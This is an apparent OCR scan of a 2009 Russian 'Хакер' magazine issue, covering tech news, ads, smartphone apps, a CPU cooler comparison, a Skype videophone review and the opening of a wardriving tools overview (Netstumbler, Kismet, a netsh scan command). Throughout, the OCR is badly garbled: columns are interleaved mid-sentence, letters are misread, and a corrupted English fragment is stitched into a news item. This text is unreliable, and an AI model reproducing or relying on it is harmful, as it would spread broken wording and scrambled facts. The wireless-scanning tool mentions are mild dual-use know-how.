Professional Documents
Culture Documents
Гu
[
comsys@comsys.гu
•
-----~ г. Краснодар, ул. Красная,д.18О
СОМВУ8 I'1ЮFI
тел.lфакс: (861) 251-84-84 и (861) 215-18-70
НАДЕЖНОСТЬ
ПРОВЕРЕННАН ВРЕМЕНЕМ
11
fnref,ln1el Core Quad ЯВl1ЯЮТСЯ товарными знаками. либоэзрегистрированными'Jоварными ::IH<uI3WM, права на которые прмнадлежат корпорации Intel ми ее подразделениям на территории США м друrкх стран.
Корпорация rntel не несет ответственность и не осуществГ\яет проверку добросовестности иГ\и достоверности каких-Г\ибо утверждений иГ\и эаявГ\ений
относитеГ\ьно конкретных компьютерных систем, упоминание о которых содержится в данном документе.
© 2009 г. Celeron, Сеlегоп Ins,de, Сепtппо. Centrlno Inslde. flОГОТиП Cen1flno, Соге Inside, iIOготип Iпtеl, Intel, lmel Соге, Iпtеllпsidе,flОГОТИП Intellnslde, Iпtеl ViIV, Intel \IРщltаПlum, Itanium \nside.
Репtiuгп. Pentium Inslde, V,iv Inside, vPro Inside, Хеоп, и Хеоп IПSldе яв!\яются товаРНЫI~И знака~IИ права на которые принад~,ежат корпорации Intel на территоplo1И США и других стран.
Все права защищены РеКl\а~1а.
Ноут6укдляшкольников
ИСLудентов
ным корпусом, который позволит диск емкостью до 250 ГБ. или SSD
избежать царапин и других ме дО '16 ГБ; гигабитный сетевой
ханическихповреждений [этому адаптер; WIFh-\одуль. и, наконец,
поспособствуети отсутствие кард-ридер 3-в-1 для SD\MMC
вентиляционныхотверсщй на карт. Также на выбор пользовате
нижней стороне Kopnycaj, клави лю предоставяттри разных ОС
атурой с антибактериальным пок Windows ХР Ноте. Windows Vista
рытием и опциональным ремнем или Liпuх UЬuпtu. Окончательная
для переноски на плече. Цветовых цена ноутбука, разумеется, будет
решений будет 5: красный. жел зависеть от комплектации, но уже
Книга ЖЖалоб и
~~:Х>F.<-(!>,,~tSIl(Ij;t)
предлоЖЖений
Мы уже писали отом, что президент рф пришлось возлагать буквально к забору. Каково
~~~.:::~~-::=::--.
Дм итри й АнатольевичМедведевтеп ерь ведет же было всеобщее удивление, когда 15-го
--,., ....... ..........
_'<I"_.''''''''_<Т<'''~~
~~:s-=:::=':':-
~ блог не только на kremlin.ru, но и в ЖЖ. куда числа на комментарий был дан ответ со сканом
;:~~~-:!:=."-, дублируютсязаписи с правительственного официального документа, подписанного
/' портала Но кто бы мог подумать, что президент президентом РФ. Бумага содержала изначаль
/r;-'1"~ ...,.,~
,i(!/p.,~ "tf.-,I. станет отвечать на ком менты В журнале, да еще ный текст комментария-жалобы и следующую
/,,", 1{V как! После лразднованиядня Великой Победы, приписку от руки: «А.Н. Ткачеву: Разберитесь.
~.;'/-" (J >,,-
!' 'f"l СУ L 1О-го мая. в блоге первого лица государс Накажите виновных. Доложите в трехдневный
1 'n" тва появился комментарий. в котором юзер срок». Дата, подпись. Пару дней спустя в пресс
ft·
. )~. {~ '1 voda_IJyba жаловался на власти Краснодара службе президента подтвердили, что поруче
Из-за них вечный огонь в городе реконструи ние действительно было передано губернатору
.~,
DDoS-атака
в реале
Страсти BOKpyrThe Pirate Вау и не думают стихать. Хакеры со всего мира продолжа
ют строить каверзы компаниям и организациямобвинителямтрекера, Пиратская
партия Швеции из-за громкого процесса набрала невиданную мощь итеперь имеет
все шансы пройти в Европарламент, противники копирайта активно протестуют,
а сами админы ресурса держатся молодцом Так, Готфрид Свартхольм, уже и без
того известный миру как парень неробкого десятка (И,l.1енно он отвечал на гневные
письма правообладателей, не скрывая сарказма и ехидстваl, предложил устроить
сообразную DDoS-атаку на адвокатскую фирму Danowsky & Рагtпеrs. Именно они
защищают интересы медиа-магна1·ОВ. Готфрид призвал народ, в знак «огромной
Фnешкасо
встроенным
_..--.---
антивирусом
\\
Асе
\
\\. I(омпании Transcend и Trend Micro решили радикальног;одойти к проблемезара
жения компьютеровчерез флеш-наког;ители.Они собираются выпуститьфлешку
\ JetFLash V15 AntiVirus USB Flash Orive со встроенным антивирусом Т rend Micro USB
Security. Девайс защитит от заражения и порчи какхранящиеся на нем данные, так и
П К, к которому производится подключение. Встроенный антивирус проверит каждый
передаваемыйфайл и в случае обнаружения малваря - предупредит юзера и помес
С_.' ~
ПО ДАННЫМ ПРОЕКТАRUМЕТРИКА,
~
. •.. 440/0 РОССИЙСКИХ ЮЗЕ РОВ НЕ ГОТОВЫ
ПЕРЕСТАТЬ ЮЗАТЬ И-НЕТ, ДАЖЕ ЕСЛИ У НИХ
неслишком приятно.
НА «СЕКРЕТНЫЙВОПРОС»
50.000:1 и временем отклика 2 мс, оснащены такими функциями как
Auto BГlght. Time Сопtгоl, Сiпегпа Mode и Live Sensor. ЭТО значит, что
С «ЖЕРТВОЙ» ЧЕЛОВЕК.
стоит заметить. что эта опция существенно сократит расход энергии,
похоже, может остаться в прошлом только В ОдНОМ страны попросту приказали прикрыть к
случае, если одна из компаний прекратитсвоесущест нему доступ, но команда ТРВ обратилась
бы те отказывались от использования В своих продуктах стран БУКGально ликуетпосле вынесения ситуация, сучетом того, что ТРВ не имеет
чиповАМО. Было начато расследование, и закончилось приговора поделу команды The Pirate к Италии никакого отношения, пока не
оно лишь недавно. По его результатам Еврокомиссия Вау Но некоторым, похоже, не терпится совсем ясно. Какая-то кон кретика по этому
вынесла неутешительныйдля Intel вердикт вину ком повторить успех Швеции лично. Стало вопросудолжна появиться вближайшие
пании, очевидно, смогли доказать и приговорили Intel к известно, что теперь при влечь команду пару месяцев, и тогда же станет известно,
штрафу в размере 1.060 миллиарда евро, за нарушение многострадального трекера к ответ бытьли этому суду вообще.
антимонопол ьного законодательства Евросоюза. Сумма
НОВЫЙ [ридер
чтение на них технической или учебной TO~~, что цена на 6" модель составляет
КiпdLе ОХ составит 1200х824. За Не WfI1 ~O'N 1n I.eмn1ni: iшw 10 _talk. "Му
paH~nt:f WC~C $с) WOf':'1ed," Ье latcr rcal1~d, ·'th.M
счет скругления углов вторая Ю!:,УCOMUlM а <10<:\0'1:: Е'(en :.fttr bc'had bc::1UD"
u:nпg ...r~s.. somedm~ :lrt~f t!te II~ о! ~,k
инкарнация KindLe стала похожа dМ!:10~ а qUltk тат pUlmptod the"'t3mll1~d.
КОМПАНИЯ MCAFEE
to dub ыт ·der De~rtt'.". tht' dopey on"t. ЗJld
на большой IPod. Также читалка other5 }п ьь rami1,)' w laЪel bдn "'$ ":UmoF
~[ds.~ When~wr bot""bl some\:hil)g .10 ~.
значительно «похудела» И обза hf IIfOU1d ~it outоnhirmiеll:wЬЩ>trringit.sofIi.у
IР-АДРЕСОВ, ИСПОЛЬЗУЕМЫХ ными на задней части корпуса. diftkulty witb tangщo3! diJlt· 1h~.;arotlDii
fc:!ll't:d Ье Yюul3 ne\~r.l~m.·J
Бiф
;;:
~ 014 ХАКЕР 06 1126/ 09
С'
СТАТИСТИКА РАNDАSЕСURIТУУТВЕРЖДАЕТ, ЧТО 670/0 ПОДРОСТКОВ
ДРУЗЕЙ В СЕТИ.
•
Вести с попей разработки I о 57
Так как вся прогрессивная часть человечества Damballa, зараженоуже порядка 30 тысяч машин. Так что, дорогой
уже тестирует реше-кандидат Windows 7, вы читатель, советуем качать Windows 7 с гтжгоsоit сот, а не иэ торрентов
ложенный в Сеть в начале мая, его, раэумеется, Тем более, «мелкомягкие» любезно и совершенно бесплатно предоста
не могли обойти вниманием вирусмэйкеры вяттебе и сам дистрибутив, и серийник к нему, валидный до мая 201 О
и борцы с оными_ Недавно стало известно о года. Ну а заодно можешь потестировать и новый продукт от Kaspersky
том. что вместе с одной из пиратских версий Lab - Kaspersky Anll-Virus В О для Windows 7. Совсем недавно началась
дистрибути ва распространяется троян, который орrанизует из компью бесплатная бета. которая должна продлиться полгода АНН1ВИ рус подой
теРОЕ на баэеWiпdоws 7 RC ботнет Поданнымэкспертов компании деткакдля бета, так и для RС-версии Windows 7.
./ Адаптировандля России
./ Утилита быстрой
настройки
беспроводной
сети
Беспрецедентнаяскорость для
вашей сети с техноnогиями
Gigabit Etheгnet и 802.11N
------------------<0
• W~FI 300
Мбит!с,
поддержка 802 _11 п и 802,11 bIg
• 4 порта 'LAN Gigabit
и 1 порт WAN Gigabit
• ASUS Green Network Technology
эффективное расходование электро
энергии и защита окружающей среды
без потери производительности
,c::au=.
ASUS WL-130N ASUS WL-160N'
высокопроиз80дительный Компаl<ТНЫЙ US8 2.0
адаптер pel 802.11N адаптер 8D2.11N - •• ®
В""мирная гара",ия 2 годв Горячая линия AS~: (495) 2З-U-999 www.asus.ru
ди,,~иб""то~ы: БЮРОКРАТ (4951 745-55-11: Koodoo Tec~nolo9i .. ('95) 256-Н-31. OLDI ('95) <2-11-111: ПИРИТ-Дистрибуция (495} 974-3210; TRINITY-ЕLЕСllЮNIСS ',""'.lri-,I." Inspiring Innovation 'о Persisterlt Petiection
Мобильный
чемоданчик
хакера
Телефон, компьютер, плеер, фотоаппарат - маленький арсенал, который всегда
хочется иметь при себе. Но реально ли заменить его лишь одним компактным
устройством, которое сможет пригодиться в любом месте в любое время? Легко!
Если это современный музыкальный смартфон с QWЕRТУ-клавиатурой, такой как
Nokia 5730 XpгessMusic.
--~O
О
Когда много лет назад которая сильно сковывает и огра Если тебе надо позеонить или чать" Встроенная камера на 3
родители подарили мне ничивает действия пользовате быстренько скинуть короткую мегапикселя никогда не заменит
первый Pentium 1ЗЗ МГц с 8 ля Зато, получив в распоряжение SMS - нет ничего удобней TpaAI.1 "зеркалку", нодля того, чтобы
Мб оперативки на борту, я и полноценную QWЕRТУ-клаву, на ционнойтелефоннойклавы, заснять смешной момент или
подумать не мог. что девайс с на смартфоне МОЖClо делать все. что НО стоит раскрыть боковой слай сделать видеоролик, - зто самое
м ного большей мощностью будет угодно. дер, какутебя в руках оказывает то, В конце концов, платфор
постоянно при мне, просто в кар Причем, если раньше полноцен ся полноценная клавиатура, и ты ма Symblan самой последней
мане джинсов Я говорю про свой ной клавиатурой могли похва можешь набиратьтексты любой редакции позволяетустановl.1ТЬ
смартфон. И все-таки, несмотря литься толькотоповые модели длины [я даже успеваю записы кучу разных приложений, пре
на внушительные характеристи коммуникаторов на Windows ватьлекцииl, кодить на Python вращая Nokia 5730 XpressMusic в
ки, мы никогда не используем Mobile састрономическими или общаться в аське. Больше униsерсальногосолдата, Праsда,
телефон как ко,mьютер - но ценниками, тотеперьза ВПОЛClе того, прямо на лицееой панели здесь важно не потеряться в раз
почему? Ведь есть операционка, разумные деньги можно приоб имеются кнопки для управления Hooбpaзии софта и устанавливать
есть программы для нее, и есть рести Nokla 5730 XpressMusic. плеером и sкупе с3 Гб карточкой, тол ько проверенные
ресурсы для запуска - что же И купить его есть за чтоl Главная которая идет е комплекте, мы еарианты. Но именно такие про
мешает? По сути, единствен фишка телефона - уникальный получаем отличную замену iPod'y, веренные нами утилиты мы тебе
ным сдерживающим фактором фор,~-фактор, совмещающий в которую в отличие от обычного сейчас и посоветуем.
является неудобная клавиатура. себе сразу две клавиатуры, плеера всегда можно <<прока
О Грамотный О Файловый менеджер
О Видео-плеер
таск-менеджер Для навигации по файловой системе твоего Любой пользовательWindows Mobile хорошо
Стандартный таск-менеджер, безусловно, смартфона рекомендуем устаноаить класс знаком сзамечательным проигрывателем
хорош. для обычного Г10льзователя. Если ный фаЙЛОВЫI~ менеджер X-plore. Помимо видео CorePlayer. Шустрый, безглючный и
же нужно поглубже заглянуть в систему, то удобнейшего интерфеv,са, ты получишь в очень удобный, он делает всех конкурентов
придется поставить JBak ТаskМап. распоряжение поиск по имени файла или от на раз-два. Где еще найдешь плеер, который
В итоге, ты получишь возможностьпро ры вку текста, встроенный аудио\в идео- плеер проигрывает видео с любыми кодеками не
и просмотрщикизображений. Болеетого, хуже чем компьютер с K-Lite Code Pack'oM? По
смотра списка процессов, потоков и блоков
нет быстрее способа передать нужный файл сле приобретения смартфона на SуmЫап мне
памяти, а также сможешьуправлять авто
через BI.uetoolh или MMSI было особенно приятно, что версия CorePlayer
запуском и быстро переключатьсямежду
есть идля этой платформы.
активными процессами.
---
Bluesoleil, то ничего не получится.
-§~
-~O
О Распознавание музыки О Безопасность
5hazamID - зто одна из моихлюбимых программ для телефона, которой С появлением возможности редактировать файлы или удаленно кон
я пользуюсь чутьли не каждый день. Идея простая I Если где-то в кафе, нектиться к серверам, кданным на телефоне стоит относиться с особой
по радио да неважно, где еще, заиграла прикольная композиция, то осторожностью. Небольшая тулза Best Cгypto позволит 256-битным
можно очень просто узнать, что зто. Включаешь 5hazагпID - 'га запи ключом зашифроватьлюбые папки или файлы. Теперь, чтобы открыть
сы вает небол ьшой семпл, отправляет его на сервер и уже через пару их, потребуется ввести пароль или сложную парольную фраэу. Другая
секунд, скорее всего, покажет тебе имя исполнителя, названиетрека и утилита symvpn поможет защитить данные от перехвата, устанавливая
даже обложку альбома I безопасный РРТР-канал до VPN-сервера. А это, кстати, еще и способ
сохранить анонимность.
О Разговаривай бесплатно
Ощутив раз всю жестокость международного [да и междугороднего роу О Альтернативныйплеер
мингаl, желание разговаривать в «чужой» СОТОВОЙ сети сильно притупля Если скины стандантного плеера, восьми эквалайзеров, способных
ется. Но когда в распоряжении есть смартфон с Wi-Fi, о подобных затратах изменять звук до неузнаваемости, и вообще, 80 всех отношениях при
можно забыть, уста н оаи в замечательную программу Fгiпg. Подкл ючив ятный плеер платформы 560 Featuгe Расk2тебя вдругне устраивает,
шись К ближайшему хот-с поту Iв кафешке или гостинице), 'ГЫ можешь могупосоветоватьтолькоодно - OggPlay. Помимо большого числа
позвонить куда угодно, используя все возможности VoIP- телефонии. А поддерживаемых форматов [новомодные ogg, .oga, .flac и, конечно же,
что зто значит? Все просто: бесплатные звонки на такой же VolP-клиент .mp3i, у плеера есть еще две удобных опции. Первое - настраиваемые
[прежде всего, Skype) или звонки ПО любым номерам за сущие копейки горячие клавиши. И второе - автоматический поиск файлов для вос
\вплоть до бесплатных на городские в Москве и Питереl. Причем для произведения 8 НУЖНОЙ папке, избавляющий от геморроя с составле
тебя такой звонок ничем отличаться не будет, крометого, что весь трафик нием плейлистов при каждой эагрузке новой музыки.
пойдет не через дорогостоящий GSM, а через WI-FI.
I'ТЕМПЕРАТУРА. ( 7'~
о 5 1О 15 20 25 30 35 40 45 50
ХОЛОД
РЕШАЕТВСЕ
Сравнениеохлаждающихсистем для проц,ессоров
НЕСКОЛЬКО всерьез задумались о снижении гютребляемой крепления, габариты, теплоотвод и т.д,] дейс
ПО,КОЛЕНИЙ КУЛЕРОВ мощности, так как чисто экстенсивное развитие твительно хорошо сбалансированы!
Еслиуж речь зашла о модернизациисистем стало себя исчерпывать. Та же ситуация произош
охлаждения,то полезно вспомнитьновей шую лa скулерами - делать вентиляторы размером с МЕТОДИКА ТЕСТИРОВАНИЯ
историю их развития, Начнем приблизительно весьсистемный блок - зто, всеже, глупость. Для теста ~~ы взяли4-ядерныйпроцессорАМD
года этаксдвухтысячного.Мощные кулеры стали Примерно С 2006 года начинаютмассово появ Phenom Х4 9950, у которого максимальная мощ
устанавливатьна процессоры InteL. начиная ляться нововведения втехнике охлаждения. ность рассеивания соcrавляет приблизительно
с Репtium 111. Чуть раньше они появились на Во-первых. жидкостные системы, как бо 140 Вт. Отметим, что стенд. на котором ПРОVlЗ80
разработках АМD. - поскольку энерговыделение лее тихие, эавоевали большее количество дилось тесги рование, был открытым - в этом
каждого транзистора Icледовательно, и всего ПОКГОННИКОG, нежели было прежде. Однако зто случае мы отсекаем возможную дополнительную
процессора! у них было больше, нежели у "пенти экзотика. В основном начали входить в жизнь погрешносгъ, вызванную нагревом корпуса.
умов». Чуть позже они эту проблему испраВИЛI~. более теплопроводные материалы; увеличива Конечно, термопаста существенно ВЛVlяетна
Изначально система охлаждения была проста, лись площади радиаторов Iза счетуменьшения отвод тепла, поскольку обладает собственным
как гвоздь - брался радиатор [как правило, толщины пластин и увеличения их количества), тепловым сопротивлением на границах сред(тем
алюминиевыйl и на негоустанавливался не· применялись тепловодные трубки и пра виль не менее. оно меньше. чем тепловое сопротивле
большой вентилятор. В принципе, общая схема ная организация притока и оттока воздуха ние раздела процессор-радиаторJ. Для объектив
прослеживается и В сегодняшних ~юделях, через корпус- раньше об этом если и думали, ности мы использовали одну и туже пасту на всех
однако нынешние - гораздо более производи то не сильно. И буквально год назад началVl кулерах Noctua NT-H1
тельны при сравнимых размерах появляться модели, которые действительно Самтестпроизводился утилитой S&M С помо
Примерно в 2004 году начали появляться можно назвать кулерами нового поколения щью нее мы нагревали процессор втечениеЗО
кулеры-монстры, моду на которые стал задавать В них большинство характеристик [материал, минут. Тихие кулеры без регулировки вращения
Therma ltake. Одна ко а погеем стал, пожаЛУЙ, 2007- й. оцен ивались лишь в одном режиме, более
Примерно тогда же производители электрони ки продвинутые - в двух: на максимуме и при ско
Процессор: АМD Phenom Х4 9950 Black Edition объясняетс" тем, что на многих вентиляторах
Тестовое оборудование: Системная плата: Foxconn A7DA-S (чипсет АМD с переменными режимами работы эта частота
Thermalright IFX-14 Память, Мб: 1024, модуль Corsair СМ2Х1024 Тем пература сн ималась с внутриядерных датчи
Хilепсе Black Hawk Еditiоп Жесткий диск, Гб: 500,Samsung НD501 LJ Everest. Естественно, отбирались максималь
Zerotherm ZEN FZ120 Блок питания, Вт: 720. Enermax EIN720AWT ные значения. Уровень шума оцеНVlвался,
IceHlammer Thermal.right
IH-4405 IFX-14
Технические характеристики: Технические характеристики:
Поддерживаемые процессоры: АМD 50cketAM2/AM2.... lntel LGA775 Поддержива емы е п роцессоры' АМ О 50cket АМ2/АМ2"', Intel LGA775/
Материал подошвы: медь LGA1з66 (с пом о щью доп. а кс ессуа ра I
КоличествотеПЛО8ЫХтрубок: 5 Материал подошвы. медь
Вес, г· 790
••••••••• 0
••••••••••
Начнем с плюсов. Во-первых, технология НОТ [Неаtрtре-Оlгесt- Touchl,
суть которой состоит в том. чТо тепловые трубки подходят как раз к
плоскости контакта процессора и радиатора Это улучшаеттеплообмен
•
Кулер оказался лучшим среди рассмотренных в тесте Всего 36 градусов
при обдуве одним [11 радиаТОР04 диаметром 120 мм - это очень сильный
в саМИА куле ре Основание радиатора выполнено из меди, а вентилятор результат Вместе с радиаТОРОfА никаких вентиляторов В комплекте нет
устройства имеет девятьлопастей. Скорость их вращения изменяется (хотя есть посадочные места аж для четырех), но зато присутствует IFX-1 О
8 пределах от 850 до 1650 об/мин Iчто, вообще говоря, противоречит - дополнительный радиатор для охлаждения обратной стороны сис
официальным данным). Крометого, на радиатор можноустаНО8итьеще темной платы Мы установили на радиатор IFX-14 одну 120 мм вертушку
один, дополнительный вентилиор В комплекте скулером идеттюбик с Antec Tr'iCoollEO и, тем не менее, получили наилучшие результаты.
термопастой Такая щедрость для подобной цены' .. По ТТХхарактерис На IFX-1 О также есть кулер, хотя во время 'геста мы его ВЫКJIючали, чтобы
тики термопасты таковы: теплопроводность более 75 Вт/(м*К], тепловое оценить именно процессорный охладитель.
Техническиехарактеристмки:
Поддерживаемые процессоры: AMD SocketAM2/AM2+/939/940/754.
••••••••• 0
••••••••••
Эта модель от Тhегmаlгight конструктивно схожа с IFX-14: такой же ТеПЛООТ80Дэтой м одел и улучшен посредством шести 8-миллимеТРО8ЫХ
массивный теплообменник, те же теплаотводные трубки Последние тепловыхтрубок. Еще одним плюсом является гидродинамический
соединены с корпусом пайкой, что улучшает общуютепловую проводи подшипник,установленныйв '120 мм вентиляторе, который. кстати, за
мость. В «плюсы» также отнесем и большую площадь ребер радиатора креплен на радиаторе при помощи резиновых креплений. Это позволяет
В тесте устройство показала результаты, схожие с покгэателями IFX- 14 с погасить ненужные механические колебания. Есть возможность регули
В комплекте имеются крепления на Iпlеl LGA775 и АМD SocketAM2+, Результат устройства в тесте нас приятно удивил - температура не под
однако этим производителирешили неограничиваться Дополнительна нялась выше 40 градусов Г10 Цельсию!
можно приобрести переходники под LGA1366, АМD Socket 939 и Iпtеl Еще одним немаловажным преимуществом стала цена, а также то, что
Хеоn. На официальном сайте они доступны по цене $1 О [у нас, соответс модел ь может работать Г1рактически с любым современным процессо
твенно, будут стоитьдороже). ром. Теплопроводности хватит даже на самые горячие камни
. " , , ,
» fet-num'
Zerotherm Noctua
ZEN FZ11 20 NH-C12P
Технические характеристики:
Эта система охлажденияпостроена по ставшейуже классическойсхеме: Каркасом всей конструкциислужат шесть тепловыхтрубок, при ЭТ0>4 сто
на медном радиаторе вертикальнорасположенвентилятор. Соединение ит заметить, что ребра радиатора крепятся прямо к площадкесоприкос
выполнено при помощи четыреХ'геl1ловыхтрубок,при этом использова новения с процессором Она, кстати, не совсем обычная. с дуговым риф
лась пайка У ребер радиатора довольно необычнаяформа. На офици лением. Из разумных объясненийна ум приходитувеличениеплощади
альном сайте производителязаявляется, ЧТО'гакая форма увеличивает соприкосновениятермапасты и радиатора, но В таком случае надо оной
площадь поверхности.а. следовательно,ВОЗ~40жен более интенсивный всю нижнюю поверхностьрадиатора просто залить. На краяхлопастей
теплоотводв атмосферу. Вентиляторуправляемпри помощи PWM, при вентилятора им е ются зазубрины. Он и разделяютобраЗУЮЩ\о1есявихре
чем довольно легко Да и крепится без особых проблем - на АМ2+ встал вые потоки на более мелкие IуменьшаетуровеньШУ~4а). Кроме того, по
буК8альноза минуту Конечно. с Iпtеl'ом все будетпозаК08ыристее заверениям разработчиков,спектр шума расширяется,что делает его
из-за подпружиненных креплений. устана8ливаемых с обратной стороны менее надоедливым[говоря умными словами. при этом он приближен к
платы. По части зффективности - результаты I~ормальные, однако ничего математическоймодели адд\о1ТИВНОГОбелого гауссова шума ... I. Шумит и
выдающегося. Еще раз подтвердилось правило «цена - не показатель виБР\о1рует кулер реально очень слабо
качества».
ВЫВОДЫ осноВной фун кцией - охлажден ием процес Ice Наттег IH-4405 - в его цену я сначала
Все модели по-своему хороши. Но у каждой сора - справилсяТhегmаlгight IFX-14. за что просто не поверил. Впрочем. остальные моде
из них свои недостатки, и каЖДдЯ подходит заслуженно получает приз «Выбор редак ли также неппохи. Х
под разные задачи. ОДНё!КО лучше всего с ции». Лучшую покупку однозначно забирает
A~US ,
AIGu"rUSV1
ТЕХНИЧЕСКИЕ
ХАРАКТЕРИСТИКИ:
Дисплей: LCD 7", 800х480
KaMepa:VGA,640x480
Интерфейсы: Ethernet, 802.11 b/g
Габариты: 202 х 12Зх25З мм
Вес 1,6кг
ЧТО ОН МОЖЕТ? гаджет, мы приступили к настрой пользоваться. Организовать можно по видеосвяэи - аффект
Гаджет под именем ASUS AiGuru ке, Разговорс устройствомна телеконференцию тоже ~~ожно, но? Кроме того, такой девайс
SVl создан для разговоров при английскомязыке не вызывает но без мышки - тяжеловато. Еще крайне пригодится, если утебя
помощи интернет-телефонии от восторга, но в данной прошивке одно огорчение нас ожидало при имеется брат или сестра, крайне
Skype. Программа уже обрела русскогоязыка ,;е имелось. Введя загрузке списка контактов: все словоохотливые и имеющие
попу.лярность, а доступность ши логин и пароль [если утебя их нет, русские ники не отображались, как массудрузей в Сети. Чтобы он или
рокополосного интернета сделала тоты сможешыутжезарегис и присылаемые сообщения. На она не занимали компьютер, ты
С80е дело - теперь проще ДОЗ80 трироватьсяl,~Ш принялись iial;HOM зтапе девайс совершенно просто подключаешь видеофон по
ниться кдругучерез интернет, чем названиватьзнакомым. Громкость не дружит С русскими шрифтами беспроводной связи и отправля
ждать, пока он оторвется от компа динамика и чувствительность 'у нас был демонстрационный ешь родственничка в соседнюю
и найдетсвою трубу дo~~a. Неко микрофона порадовали,но мы образец, будем надеяться, что комнату: для тебя - возможн ость
торые пользовател и обзаводятся так И не встретили регулировки видеофон появится 8 продаже с спокойно посидеть перед компом,
web-камерами и тогда уже можно микрофона.А вот качество картин нормальной руссификациейl Раз а для нее или него - П080Д пох
устраивать видео конференции. ки встроенной камеры откро уж м ы затронули тему управления вастаться новой игрушкой перед
Но все зто стаНО8иТСЯ недоступ венно разочаровало'при любом кнопками, то нельзя неупо~~януть друзьями. Ктомуже, ты можешь
ным, как только ты выключишь освещении и л юбых настройках об зргономике в целом Здесь всегда оставаться на связи, даже с
свой компьютер изображениеможно назвать не можно только порадоваться выключенным компьютером - мо
Этот девайс - сам по себе не более, чем удовлетворительным, Устройство очень устойчивое, а жешь организовать консультации
большой компьютер, заточенный ТЫ можешь поигратьс ползунками панель СДИСГlЛеем наклоняется по Сети, а параллелыiO работать
под одну еДИНСТЕен ную задачу: яркости, контрастностии еще ОТI~осительно ОСI~ования. В самом на компьютере, не занимая окном
обеспечить удобство переговоров. задеЙСТВО8атьпяток других, но основании спрятан аккумулятор, скайпа драгоценную площадь
Встроенный динамик и микрофон это не особо помогает, Фокуси который обеспечивает не очень дисплея.
позволят обойтись без гарниту ровка не изменяется и придется длительную автономную работу.
ры, но при необходимости ты их довольствоватьсяустановками по Кнопок немного и все они доволь ИТОГ
сможешь подключить. КоличеСТ80 умолчанию. Попытка подключить но крупные, так что даже в темноте в качестве итога можем собрать
кнопок сведено к мини~~у~~у, так ся к роутеру по W,-Fi не увенчалась п ромахнуться будет сложно. все впе4атления и рассказать
что ты сможешь работать без успехом. Немного поразмыслив, о чувствах, которые вызывает
затруд·нениЙ. Дина ми к довол ьн О мы отключили шифрование и тог НАХОДИМ этот деваЙс. 8идеофон несет
звука ты сможешьдаже 80 время итутне все гладко прошло. даже Стильный и зргономичныйдевайс только голосом, но и при помощи
разговора. Кроме того, девайс при вкл Ю4енном О НСР гаджет не можно использовать [хотя и не на изображения. Работать стало
оснащен собственным аккумуля смог автоматически прописать полную катушку, как зто делается действительно легко и с этим
тором, и ты сможешь быть незави все адреса и пришлось зто делать на компьютереl. Но где же он мо спра8ИТСЯ даже твоя прабабушка,
симым от розетки около получа са вручную Вероятно,проблему жет найти свое применение? Если если ты все настроишь. Но есть
разговора. удастся решить с выходом новых ты приверженец ноутбуков, то некоторые недоработки, вроде
По функциям самой программы прошивок. После подключения врядли потерпишь на своем столе отсутствия поддержки шифро
Skype ничего не изменилось: ты все заработало довольно стабиль нагромождение пластика и злек вания при подключении по Wi-Fi
также, как И прежде, можешь но и шустро. Но тут мЫ столкнулись тронной начинки. Если же утебя или невозможностиработы с
добавлять новых пользователей, с еще одной проблемой - набор стандартный десктоп, тотакже кириллицей.Кроме того, видео
открывать чаты и организовывать текста Глядя на довольно крупный может не найтись места на столе. фон, основной функцией которого
телеконференции. дисплей, было бы логично пред Но когда в твоей организации является как раэ передача изоб
положить, что он будет сенсорным, решат, что нужна свяэьдешевая, ражения, должен демонстриро
НАЧИНАЕМ но зто не так. Все цифры, символы качественная иудобная, то вполне вать картинку если не идеальную,
ТЕСТИРОВАНИЕ и БУК8Ы приходится наб и рать можно вспом нить О видеофоне. то очень высокого качеСТ8а, чего
Включив девайс мы сразу же при помощи пятипозиционной Замечено, что директора и ТОП мы, к сожалению,не наблюдали,
решили подключиться к Сети. кноп ки Так что, если тебе надо менеджмент любят различные ус В остальном же, гаджетдовольно
Первымделом мы подключили добавить нового пользователя тройства, которые подчеркивают интересныйи будет пользоваться
ASUSAiGuru SVl по Еthегпеt-ин или сформировать список або значимость. Например, позвонить популярностью,особенно если
терфейсу. Обвязавшись кабелем нентов, то проще зто 6удетсд~лать секретарше и попросить кофе цена опустится хотя бы до трех
и установив на удобном месте с компьютера, а потом просто можно по обычномутелефону, а тысяч рублей. I
"
» pc:_zone
"
Netstumbleг ' ~
www.stumbler.net
Определенно один из самых известных и лучших - - .
I
~-.IL\J Chaмelt МАе SSID I H:h"" I VendOl Т,''''' Еnс. .. ~
инструментов для вардрайвинга. У стемблера itJ··""
всего одна задача - обнаРУЖI1ТЬ в эфире точки
SSID.
ffi·~? Fiael~
@ 00045дЕВ4З61
О 00022DOECFI5
ieJr1'~rn
JGKAirPot-' net",...ork ,
6 Lilrk$Ys-
P,o><im {Ago..JORiNOCO
АР
АР
"'ЕР
использования шифрования сети, не уточ Ну ХОРОшо, а как быть если на ноуте/нетбу которые парсят ВЫЕОД команды Iwlist.
НЯЯ какой именно механиэм используется. ке стоит Vista или WIП7? По правде говоря, Забавно, что Vistumbler написан с помо
Вдобавок, программа наотрез отказывается возможность аКТИЕНОГО сканирования точек щью 1Улзы для аюоматизации различных
работать под V,stа'ой и вряд ли когда-нибудь доступа есть в самой с,",стеме Это делается с действий Autolt iПОДРОбнее о ней можеLIJЬ
это делать захочет В результате, получаем помощью консольной утилиты пеtsh: прочитать в статье «Пусть ОН все сделает
отличную программу, если нужно проска netsh wlan show леtwогks mode;bssid. сам!» в #]()7 ::x:1, позволяющей разработать
нировать эфир на наличие точек ДОС1Упа и Однако умелец Апdгеw Calcutt быстро свар приложения даже тем ЛЮДАМ, которые О про
0Y",;;",t4';;;:-';;';".ml~-------_i..~::'r:o:;;;';;:=,''''---'''
- __ -.. - - - __ ее для поиска Wi-Fi спотов и определения
_~'J'II 1k!'?1I;
"'.. . ~~ _ .. н_ используемой ИМИ защиты.
,W
11
~
11
11
=:=::= .
....... mJ.IIOR:1»1
__
__
~ИI)
Oo:Jnд7t-l:::q
~w
~ w"
1'«Iш·
I#1/-Юt~
.....cn;
...."
Кismet
u
1J"'_ _
:~
Мo;j ..... iII'llп.h~
:=: ==
~"
~JI.t~J.!IЛjaoН/.l.L
::-У.М.
www.kismetwireless.net
, ~ __ ~l:бf;tмo' ~W"..,,""
А это уже полноценное никсовое при
~ ~_::f,«.0(J ~""'''..
...........
I
1
__
__
~=~аш
~_
~"'Ii'fi0'1
....
, ",.
ложение для поиска беспроводных сетей,
I
~Я"'J1
)
J
"_O»J1OV~
~ ... _~........-M"
"'""""'"'1<\.,1; .....
.... снифинга, и даже обнаружения вторже
! _.«-J.IAЦ~tI . . - _....
ний. Klsmet кардинально отличается от
Netstumbler и подобных ему тулз тем, что
для определения беспроводных сетей при
